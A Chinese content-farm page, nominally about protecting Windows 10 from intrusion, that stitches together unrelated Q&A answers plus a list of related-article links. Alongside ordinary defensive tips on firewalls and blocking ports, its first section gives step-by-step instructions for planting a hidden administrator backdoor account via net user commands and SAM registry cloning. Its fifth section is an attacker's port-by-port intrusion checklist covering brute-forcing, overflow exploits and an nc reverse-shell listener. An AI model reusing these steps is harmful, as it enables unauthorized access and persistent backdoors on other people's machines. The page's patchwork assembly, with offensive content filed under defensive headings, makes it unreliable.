win10怎么防止侵入

1.如何防止黑客侵入你正在使用的Windows系统?

当黑客入侵一台主机后,会想方设法保护自己的“劳动成果”,因此会在肉鸡上留下种种后门来长时间得控制肉鸡,其中使用最多的就是账户隐藏技术。

在肉鸡上建立一个隐藏的账户,以备需要的时候使用。账户隐藏技术可谓是最隐蔽的后门,一般用户很难发现系统中隐藏账户的存在,因此危害性很大,本文就对隐藏账户这种黑客常用的技术进行揭密。

在隐藏系统账户之前,我们有必要先来了解一下如何才能查看系统中已经存在的账户。在系统中可以进入“命令提示符”,控制面板的“计算机管理”,“注册表”中对存在的账户进行查看,而管理员一般只在“命令提示符”和“计算机管理”中检查是否有异常,因此如何让系统账户在这两者中隐藏将是本文的重点。

一、“命令提示符”中的阴谋 其实,制作系统隐藏账户并不是十分高深的技术,利用我们平时经常用到的“命令提示符”就可以制作一个简单的隐藏账户。 点击“开始”→“运行”,输入“CMD”运行“命令提示符”,输入“net user piao$ 123456 /add”,回车,成功后会显示“命令成功完成”。

接着输入“net localgroup administrators piao$ /add”回车,这样我们就利用“命令提示符”成功得建立了一个用户名为“piao$”,密码为“123456”的简单“隐藏账户”,并且把该隐藏账户提升为了管理员权限。 我们来看看隐藏账户的建立是否成功。

在“命令提示符”中输入查看系统账户的命令“net user”,回车后会显示当前系统中存在的账户。从返回的结果中我们可以看到刚才我们建立的“piao$”这个账户并不存在。

接着让我们进入控制面板的“管理工具”,打开其中的“计算机”,查看其中的“本地用户和组”,在“用户”一项中,我们建立的隐藏账户“piao$”暴露无疑。 可以总结得出的结论是:这种方法只能将账户在“命令提示符”中进行隐藏,而对于“计算机管理”则无能为力。

因此这种隐藏账户的方法并不是很实用,只对那些粗心的管理员有效,是一种入门级的系统账户隐藏技术。 二、在“注册表”中玩转账户隐藏 从上文中我们可以看到用命令提示符隐藏账户的方法缺点很明显,很容易暴露自己。

那么有没有可以在“命令提示符”和“计算机管理”中同时隐藏账户的技术呢?答案是肯定的,而这一切只需要我们在“注册表”中进行一番小小的设置,就可以让系统账户在两者中完全蒸发。 1、峰回路转,给管理员注册表操作权限 在注册表中对系统账户的键值进行操作,需要到“HKEY_LOCAL_MACHINE\SAM\SAM”处进行修改,但是当我们来到该处时,会发现无法展开该处所在的键值。

这是因为系统默认对系统管理员给予“写入D AC”和“读取控制”权限,没有给予修改权限,因此我们没有办法对“SAM”项下的键值进行查看和修改。不过我们可以借助系统中另一个“注册表编辑器”给管理员赋予修改权限。

点击“开始”→“运行”,输入“regedt32.exe”后回车,随后会弹出另一个“注册表编辑器”,和我们平时使用的“注册表编辑器”不同的是它可以修改系统账户操作注册表时的权限(为便于理解,以下简称regedt32.exe)。在regedt32.exe中来到“HKEY_LOCAL_MACHINE\SAM\SAM”处,点击“安全”菜单→“权限”,在弹出的“SAM的权限”编辑窗口中选中“administrators”账户,在下方的权限设置处勾选“完全控制”,完成后点击“确定”即可。

然后我们切换回“注册表编辑器”,可以发现“HKEY_LOCAL_MACHINE\SAM\SAM”下面的键值都可以展开了。 提示:上文中提到的方法只适用于Windows NT/2000系统。

在Windows XP系统中,对于权限的操作可以直接在注册表中进行,方法为选中需要设置权限的项,点击右键,选择“权限”即可。 2、偷梁换柱,将隐藏账户替换为管理员 成功得到注册表操作权限后,我们就可以正式开始隐藏账户的制作了。

来到注册表编辑器的“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”处,当前系统中所有存在的账户都会在这里显示,当然包括我们的隐藏账户。点击我们的隐藏账户“piao$”,在右边显示的键值中的“类型”一项显示为0x3e9,向上来到“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\”处,可以找到“000003E9”这一项,这两者是相互对应的,隐藏账户“piao$”的所有信息都在“000003E9”这一项中。

同样的,我们可以找到“administrator”账户所对应的项为“000001F4”。 将“piao$”的键值导出为piao$.reg,同时将“000003E9”和“000001F4”项的F键值分别导出为user.reg,admin.reg。

用“记事本”打开admin.reg,将其中“F”值后面的内容复制下来,替换user.reg中的“F”值内容,完成后保存。接下来进入“命令提示符”,输入“net user piao$ /del”将我们建立的隐藏账户删除。

最后,将piao$.reg和user.reg导入注册表,至此,隐藏账户制作完成。 3、过河拆桥,切断删除隐藏账户的途径 虽然我们的隐藏账户已经在“命令提示符”和“计算机管理”中隐藏了,但是有经验的系统管理员仍可能通过注册表编辑器删除我们的隐藏账户,那么如。

2.Win10电脑如何防止黑客攻击

Win10电脑防止黑客攻击要做到以下几点

1.确保防火墙,安全卫士,杀毒软件等开启,并正确设置参数。

2.浏览安全类的平时常用网站,不要浏览一些不健康的网站。浏览网站时,弹窗类广告尽量不要去点击它,或者可以设置阻止弹窗。

3.下载东西尽量从官网正常渠道下载,而且对下载的文件,软件进行安全检查。

4.不要安装未知程序和软件,不要随意打开或下载网络上不认识的人发过来的QQ文件或邮箱文件。

5.经常性进行查毒杀毒,并升级病毒库到最新版本。

3.怎么防止别人侵入俺的电脑啊!!!?

默认情况下,Windows有很多端口是开放的,在你上网的时候,网络病毒和黑客可以通过这些端口连上你的电脑。

为了让你的系统变为铜墙铁壁,应该封闭这些端口,主要有:TCP 135、139、445、593、1025 端口和 UDP 135、137、138、445 端口,一些流行病毒的后门端口(如 TCP 2745、3127、6129 端口),以及远程服务访问端口3389。下面介绍如何在WinXP/2000/2003下关闭这些网络端口:

第一步,在“运行”输入gpedit.msc,回车打开“组策略”,在组策略中的windows设置-安全设置中选中“IP 安全策略,在本地计算机”,在右边窗格的空白位置右击鼠标,弹出快捷菜单,选择“创建 IP 安全策略”,于是弹出一个向导。在向导中点击“下一步”按钮,为新的安全策略命名;再按“下一步”,则显示“安全通信请求”画面,在画面上把“激活默认相应规则”左边的钩去掉,点击“完成”按钮就创建了一个新的IP 安全策略。

第二步,右击该IP安全策略,在“属性”对话框中,把“使用添加向导”左边的钩去掉,然后单击“添加”按钮添加新的规则,随后弹出“新规则属性”对话框,在画面上点击“添加”按钮,弹出IP筛选器列表窗口;在列表中,首先把“使用添加向导”左边的钩去掉,然后再点击右边的“添加”按钮添加新的筛选器。

第三步,进入“筛选器属性”对话框,首先看到的是寻址,源地址选“任何 IP 地址”,目标地址选“我的 IP 地址”;点击“协议”选项卡,在“选择协议类型”的下拉列表中选择“TCP”,然后在“到此端口”下的文本框中输入“135”,点击“确定”按钮,这样就添加了一个屏蔽 TCP 135(RPC)端口的筛选器,它可以防止外界通过135端口连上你的电脑。

点击“确定”后回到筛选器列表的对话框,可以看到已经添加了一条策略,重复以上步骤继续添加 TCP 137、139、445、593 端口和 UDP 135、139、445 端口,为它们建立相应的筛选器。

重复以上步骤添加TCP 1025、2745、3127、6129、3389 端口的屏蔽策略,建立好上述端口的筛选器,最后点击“确定”按钮。

第四步,在“新规则属性”对话框中,选择“新 IP 筛选器列表”,然后点击其左边的圆圈上加一个点,表示已经激活,最后点击“筛选器操作”选项卡。在“筛选器操作”选项卡中,把“使用添加向导”左边的钩去掉,点击“添加”按钮,添加“阻止”操作:在“新筛选器操作属性”的“安全措施”选项卡中,选择“阻止”,然后点击“确定”按钮。

第五步,进入“新规则属性”对话框,点击“新筛选器操作”,其左边的圆圈会加了一个点,表示已经激活,点击“关闭”按钮,关闭对话框;最后回到“新IP安全策略属性”对话框,在“新的IP筛选器列表”左边打钩,按“确定”按钮关闭对话框。在“本地安全策略”窗口,用鼠标右击新添加的 IP 安全策略,然后选择“指派”。

于是重新启动后,电脑中上述网络端口就被关闭了,病毒和黑客再也不能连上这些端口,从而保护了你的电脑。目前还没听说有补丁下载。

4.怎样防止黑客入侵电脑 九个设置让电脑远离黑客

让电脑远离黑客,可以用杀毒软件和安全卫士。

电脑病毒是指编制者在电脑程序中插入的破坏电脑功能或者破坏数据的,影响电脑使用并且能够自我复制的一组电脑指令或程序代码。与生物中的病毒不一样,电脑病毒不是天然存在的,是某些人利用电脑软件和硬件固有的脆弱性编制的一组指令集或程序代码。它能通过某种途径潜伏在电脑的存储介质里,当达到某种条件时被激活,通过修改其它程序的方法把恶意代码或程序放入其它程序中,从而感染这些程序。如“熊猫烧香”是病毒的典型代表。

现在已经发现并正式命名的电脑病毒有几百种,如耶路撒冷、巴基斯坦智囊、维也纳、冰岛人、大麻、磁盘杀手、快乐的星期天、小球、疯狂拷贝、下雨、音乐、1505、1704、648、405。

电脑病毒按其产生的后果分为良性病毒和恶性病毒。良性病毒发作时不破坏系统数据,只占用系统资源的病毒,一般只是占用电脑资源,产生一些无所谓的消耗,或干扰机器的运行,如小球病毒。恶性病毒一旦发作便会破坏数据或系统的病毒,如大麻病毒等。

以病毒的寄生方式分类,可以分为操作系统型病毒、外壳病毒、入侵病毒和源码病毒。

操作系统型病毒——运行时,用自己的逻辑部分取代部分操作系统的程序模块,如大麻病毒、磁盘杀手等。

外壳病毒——把病毒自身包围在主程序的四周,对原来的程序不做修改,在运行主程序时,病毒首先进入内存。如耶路撒冷、维也纳、快乐的星期天等。

入侵病毒——侵入到现有程序之中,实际上把病毒插入到主程序中去。

源码病毒——在程序被编译之前插入到一些编程语言编写的程序中。

电脑病毒的传染途径通常有三种:软盘的互换使用、硬盘的感染和电脑网络的传染。

电脑病毒主要寄生在磁盘的引导扇区、可执行文件、硬盘的主引导扇区中。

电脑感染了病毒后,程序装入的时间比平时长很多,可执行程序的长度增加,磁盘访问的时间比平时长,有异常的磁盘访问,有规律地发现异常信息,可用系统空间不断变小,磁盘的不可用数增多,数据和程序丢失,打印时出现问题,频繁死机,磁盘的卷名发生了变化,使用关闭写保护的软盘时屏幕上出现软盘写保护的信息,异常要求输入口令,机器发出怪叫声,command.com、autoexec.bat、config.sys等文件已经被修改,出现异常的隐含文件。

电脑一旦染上了病毒就必须予以清除。杀毒软件也叫做反病毒软件和防毒软件,是用于消除电脑病毒、特洛伊木马和恶意软件的一类软件。杀毒软件通常集成监控识别、病毒扫描清除和自动升级等功能,有的杀毒软件还带有数据恢复等功能,是电脑防御系统的重要组成部分。

主流的杀毒软件有360、金山毒霸、瑞星杀毒软件等,集合了杀毒、防毒、实时监控和防火墙功能。

360杀毒软件的主界面,简洁大方,功能列表一目了然,单击【快速扫描】按钮,进入查杀状态。

杀毒结束后,会给出杀毒报告,根据提示进行相应的操作。

杀毒的基本原理是把磁盘上的文件与病毒库里的病毒特征进行对比,在满足特点后认定为病毒,杀毒软件默认进行杀毒操作,并把病毒进行隔离。

杀毒软件处于启用状态,在状态栏的右端显示有小图标,右击这个图标,会给出相应快捷菜单列表,可以根据需要有针对性地启用杀毒功能。

发现病毒越早越好。能够在病毒产生危害之前发现和排除它,可以使系统免受危害。能够在病毒广泛传播之前发现它,可以使系统修复的任务较轻,较容易。病毒在系统内存在的时间越长,产生的危害就越大。

5.如何防止别人入侵计算机

开启防火墙,关闭一些常用来入侵的端口,如3389

1. 1433端口入侵

scanport.exe 查有1433的机器

SQLScanPass.exe 进行字典暴破(字典是关键)

最后 SQLTools.exe入侵

=============================

对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

(以上反向的,测试成功)

sqlhelloz.exe 入侵ip 1433 (这个是正向连接)

2. 4899端口入侵

用4899过滤器.exe,扫描空口令的机器

3. 3899的入侵

对很早的机器,可以试试3389的溢出(win3389ex.exe)

对2000的机器,可以试试字典暴破。(tscrack.exe)

4. 80入侵

对sp3以前的机器,可以用webdav入侵;

对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)

可以利用SQL进行注入。(小榕的注入软件)。

5. serv-u入侵(21端口)

对5. 004及以下系统,可用溢出入侵。(serv5004.exe)

对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)

======================================

对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)

输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs

6. 554端口

用real554.exe入侵。

7. 6129端口

用DameWare6129.exe入侵。

8. 系统漏洞

利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,

进行溢出入侵。

9. 3127等端口

可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。

10. 其他入侵

利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。

win10怎么防止侵入

转载请注明出处windows之家 » win10怎么防止侵入

win10

win10怎么改图格式

阅读(81)

本文主要为您介绍win10怎么改图格式,内容包括win10怎么修改照片格式文件,win10系统自带的截图怎么换格式,win10系统怎样更改文件格式。通常我们修改文件后缀名都是右击>"重命名"来完成的,单个或少数文件的话这样完成也不费事,但如果我们有多个

win10

win10怎么玩gta4盗版

阅读(121)

本文主要为您介绍win10怎么玩gta4盗版,内容包括怎么用win10玩gta4,win10到底怎么玩GTA4,无限载入啊!!,怎么用win10玩gta4。Windows8操作系统及以上系统:为程序选择首选图形处理器:1.打开Nvidia控制中心-管理3D设置-选择要自定义的程序-添加-G

win10

win10网页怎么退出兼容模式

阅读(175)

本文主要为您介绍win10网页怎么退出兼容模式,内容包括win10怎么关闭在兼容模式,win10怎么关闭在兼容模式,win10怎么切换浏览器兼容模式。鼠标打开win10系统“开始”菜单,选中“运行”对话框;win10如何关闭兼容性选项?|win10电脑兼容性选项卡不

win10

win10怎么彻底删除百度网盘

阅读(81)

本文主要为您介绍win10怎么彻底删除百度网盘,内容包括win10中如何删除在此电脑下的百度云盘图标,win10怎么删除多余的盘,win10设备驱动器中怎么删除百度云管家的图标。打开计算机双击要取消的百度云管家的图标,点击打开。

win10

win10怎么存放文件

阅读(128)

本文主要为您介绍win10怎么存放文件,内容包括win10系统怎么另存文件在哪里,win10怎么给c盘根目录储存文档,win10系统怎么移动桌面文件保存位置?。具体方法点击开始菜单,点击设置图标;2、然后点击“系统”选项;3、打开系统选项后,点击“储存感知

win10

win10怎么呼出无线网设置

阅读(98)

本文主要为您介绍win10怎么呼出无线网设置,内容包括win10系统电脑无线网络怎么打开,windows10怎么设置无线网,windows10怎么开wifi热点。最近,一位Win10系统笔记本的用户跟小编反映:手机可以连接无线网络,但是,在笔记本上无线网络却找不到、连

win10

win10注册器权限设置

阅读(126)

本文主要为您介绍win10注册器权限设置,内容包括win10怎么注册表权限设置,如何操作win10注册表权限,win10注册表权限怎么设置技巧。在Windows10系统中设置登录用户名的注册表权限的方法步骤:右键点击开始 - 在右键菜单中左键点击:运行;2我们在

win10

联想win10开不了机了怎么办

阅读(106)

本文主要为您介绍联想win10开不了机了怎么办,内容包括联想的笔记本电脑开不了机了怎么办?win10的,Win10开不开机,联想笔记本win10开不起机。电脑开不了机,一般有硬件和软件两个方面的原因,你可以试着从以下几点入手:按下开机键什么反应都没有?

win10

win10怎么开启wifidirect

阅读(126)

本文主要为您介绍win10怎么开启wifidirect,内容包括请问win10系统怎么开启wifidirect链接安卓电视wifi,win10怎么开启无线WiFi,win10directdraw怎么开启。所需工具材料:WIN10方法如下:如果电脑是笔记本的话,先开启无线硬件开关。有的笔记本需

win10

win10手机如何远程连接到服务器地址

阅读(122)

本文主要为您介绍win10手机如何远程连接到服务器地址,内容包括win10怎样连接远程服务器,怎么用手机远程控制电脑系统用win10,win10怎么连接服务器远程桌面连接。首先保证手机与电脑保持链接在同一个局域网(wifi)内,如图。在搜索框输入“远程桌

win10

如何让win10灭屏

阅读(132)

本文主要为您介绍如何让win10灭屏,内容包括win10怎么让屏幕黑屏,win10一键熄灭屏幕,win10电脑自动熄屏怎么设置。第一步:在桌面左下角找到WINDOW 就是以往系统的开始菜单处,不过直接在键盘按WINDOW键也是一样,打开后如图所示:第二步:打开WI

win10

如何盗版激活win10th2

阅读(112)

本文主要为您介绍如何盗版激活win10th2,内容包括如何激活盗版windows10,如何激活盗版windows10,怎样激活Windows10TH2。1.在你正在使用的Win7/Win8.1系统中(注意,要确保系统已经激活)打开下载的Win10 ISO镜像,在Sources文件夹中找到

win10

如何识别win10是否为正版

阅读(129)

本文主要为您介绍如何识别win10是否为正版,内容包括如何分辨win10正版还是盗版,怎么判断windows10是不是正版,windows10怎么辨别正版?。从水印印判断Win10系统是否为正版未激活Win10正式版水印样式Win10水印总的来说分为两大类,一是预览版水

win10

如何快速进入win10屏保

阅读(93)

本文主要为您介绍如何快速进入win10屏保,内容包括win10快速进入屏幕保护,win10怎样快速进入锁屏界面,win10进入屏保怎么进入系统。菜单键加L 针对最新的win10通过360或者腾讯升级到win10的伙伴们,前几天我也升级了,但是我想设置屏幕保护,查了

win10

win10怎么改图格式

阅读(81)

本文主要为您介绍win10怎么改图格式,内容包括win10怎么修改照片格式文件,win10系统自带的截图怎么换格式,win10系统怎样更改文件格式。通常我们修改文件后缀名都是右击>"重命名"来完成的,单个或少数文件的话这样完成也不费事,但如果我们有多个

win10

win10怎么玩gta4盗版

阅读(121)

本文主要为您介绍win10怎么玩gta4盗版,内容包括怎么用win10玩gta4,win10到底怎么玩GTA4,无限载入啊!!,怎么用win10玩gta4。Windows8操作系统及以上系统:为程序选择首选图形处理器:1.打开Nvidia控制中心-管理3D设置-选择要自定义的程序-添加-G

win10

win10网页怎么退出兼容模式

阅读(175)

本文主要为您介绍win10网页怎么退出兼容模式,内容包括win10怎么关闭在兼容模式,win10怎么关闭在兼容模式,win10怎么切换浏览器兼容模式。鼠标打开win10系统“开始”菜单,选中“运行”对话框;win10如何关闭兼容性选项?|win10电脑兼容性选项卡不

win10

win10怎么彻底删除百度网盘

阅读(81)

本文主要为您介绍win10怎么彻底删除百度网盘,内容包括win10中如何删除在此电脑下的百度云盘图标,win10怎么删除多余的盘,win10设备驱动器中怎么删除百度云管家的图标。打开计算机双击要取消的百度云管家的图标,点击打开。

win10

win10怎么存放文件

阅读(128)

本文主要为您介绍win10怎么存放文件,内容包括win10系统怎么另存文件在哪里,win10怎么给c盘根目录储存文档,win10系统怎么移动桌面文件保存位置?。具体方法点击开始菜单,点击设置图标;2、然后点击“系统”选项;3、打开系统选项后,点击“储存感知

win10

win10怎么呼出无线网设置

阅读(98)

本文主要为您介绍win10怎么呼出无线网设置,内容包括win10系统电脑无线网络怎么打开,windows10怎么设置无线网,windows10怎么开wifi热点。最近,一位Win10系统笔记本的用户跟小编反映:手机可以连接无线网络,但是,在笔记本上无线网络却找不到、连

win10

win10注册器权限设置

阅读(126)

本文主要为您介绍win10注册器权限设置,内容包括win10怎么注册表权限设置,如何操作win10注册表权限,win10注册表权限怎么设置技巧。在Windows10系统中设置登录用户名的注册表权限的方法步骤:右键点击开始 - 在右键菜单中左键点击:运行;2我们在

win10

win10语言设置俄语

阅读(148)

本文主要为您介绍win10语言设置俄语,内容包括win10专业版能添加俄语系统语言吗?,win10专业版能添加俄语系统语言吗?,电脑win10的“获取帮助”按钮的语言变成了俄语怎么办?。在Windows系统中添加俄文输入法。操作步骤:点击"开始/设置/控制面板